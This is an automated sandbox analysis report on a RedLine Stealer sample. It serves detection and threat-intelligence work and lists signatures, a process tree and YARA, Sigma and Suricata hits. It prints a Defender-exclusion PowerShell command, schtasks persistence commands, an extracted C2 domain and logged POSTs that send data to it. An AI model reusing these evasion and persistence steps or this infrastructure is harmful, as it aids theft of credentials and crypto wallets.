Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
13P2mxLaQk.exe

Overview

General Information

Sample name:13P2mxLaQk.exe
renamed because original name is a hash value
Original sample name:B47604CCFF9C611EAF0AA3D7443827B7.exe
Analysis ID:1527904
MD5:b47604ccff9c611eaf0aa3d7443827b7
SHA1:c09a5be24cd42bbd7605d0b40351d5134cf782a5
SHA256:77f30441445ceb75c76eff7bfb97f24849bc6155efb298f69a795933bf2f5e9a
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 13P2mxLaQk.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\13P2mxLaQk.exe" MD5: B47604CCFF9C611EAF0AA3D7443827B7)
    • powershell.exe (PID: 3456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3832 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4468 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • VWGccZGgix.exe (PID: 5292 cmdline: C:\Users\user\AppData\Roaming\VWGccZGgix.exe MD5: B47604CCFF9C611EAF0AA3D7443827B7)
    • schtasks.exe (PID: 2036 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["billred229102.duckdns.org:34221"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x133ca:$a4: get_ScannedWallets
            • 0x12228:$a5: get_ScanTelegram
            • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
            • 0x10e6a:$a7: <Processes>k__BackingField
            • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1079e:$a9: <ScanFTP>k__BackingField
            00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.13P2mxLaQk.exe.409bfd0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.13P2mxLaQk.exe.409bfd0.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.13P2mxLaQk.exe.409bfd0.2.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.13P2mxLaQk.exe.409bfd0.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x14802:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147e3:$v2_6: GetUpdates
                  7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", ProcessId: 3456, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", ProcessId: 3456, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VWGccZGgix.exe, ParentImage: C:\Users\user\AppData\Roaming\VWGccZGgix.exe, ParentProcessId: 5292, ParentProcessName: VWGccZGgix.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp", ProcessId: 2036, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", ProcessId: 3832, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", ProcessId: 3456, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", ProcessId: 3832, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T11:29:24.542021+020020450001Malware Command and Control Activity Detected45.88.88.4534221192.168.2.849707TCP
                    2024-10-07T11:29:27.354396+020020450001Malware Command and Control Activity Detected45.88.88.4534221192.168.2.849710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T11:29:27.905794+020020460561A Network Trojan was detected45.88.88.4534221192.168.2.849707TCP
                    2024-10-07T11:29:31.060058+020020460561A Network Trojan was detected45.88.88.4534221192.168.2.849710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T11:29:27.905794+020020450011Malware Command and Control Activity Detected45.88.88.4534221192.168.2.849707TCP
                    2024-10-07T11:29:31.060058+020020450011Malware Command and Control Activity Detected45.88.88.4534221192.168.2.849710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T11:29:19.382523+020028496621Malware Command and Control Activity Detected192.168.2.84970745.88.88.4534221TCP
                    2024-10-07T11:29:22.371423+020028496621Malware Command and Control Activity Detected192.168.2.84971045.88.88.4534221TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T11:29:24.941101+020028493511Malware Command and Control Activity Detected192.168.2.84970745.88.88.4534221TCP
                    2024-10-07T11:29:27.589571+020028493511Malware Command and Control Activity Detected192.168.2.84971045.88.88.4534221TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T11:29:29.923744+020028482001Malware Command and Control Activity Detected192.168.2.84971445.88.88.4534221TCP
                    2024-10-07T11:29:32.939960+020028482001Malware Command and Control Activity Detected192.168.2.84972145.88.88.4534221TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T11:29:28.316654+020028493521Malware Command and Control Activity Detected192.168.2.84971345.88.88.4534221TCP
                    2024-10-07T11:29:31.119839+020028493521Malware Command and Control Activity Detected192.168.2.84971645.88.88.4534221TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 13P2mxLaQk.exeAvira: detected
                    Found malware configuration
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["billred229102.duckdns.org:34221"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeReversingLabs: Detection: 57%
                    Multi AV Scanner detection for submitted file
                    Source: 13P2mxLaQk.exeReversingLabs: Detection: 57%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: 13P2mxLaQk.exeJoe Sandbox ML: detected
                    Source: 13P2mxLaQk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 13P2mxLaQk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 4x nop then jmp 07A1AF98h0_2_07A1B6BB

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49707 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49710 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.88.88.45:34221 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.88.88.45:34221 -> 192.168.2.8:49710
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49707 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49710 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.88.88.45:34221 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.88.88.45:34221 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.8:49714 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49713 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49716 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.8:49721 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.88.88.45:34221 -> 192.168.2.8:49710
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.88.88.45:34221 -> 192.168.2.8:49710
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: billred229102.duckdns.org:34221
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: billred229102.duckdns.org
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49721
                    Source: global trafficTCP traffic: 192.168.2.8:49707 -> 45.88.88.45:34221
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: billred229102.duckdns.org:34221Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: billred229102.duckdns.org:34221Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: billred229102.duckdns.org:34221Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: billred229102.duckdns.org:34221Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: billred229102.duckdns.org:34221Content-Length: 962483Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: billred229102.duckdns.org:34221Content-Length: 962475Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: billred229102.duckdns.org:34221Content-Length: 962603Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: billred229102.duckdns.org:34221Content-Length: 962595Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: billred229102.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: billred229102.duckdns.org:34221Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org:34221
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org:34221/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org:34221t-
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
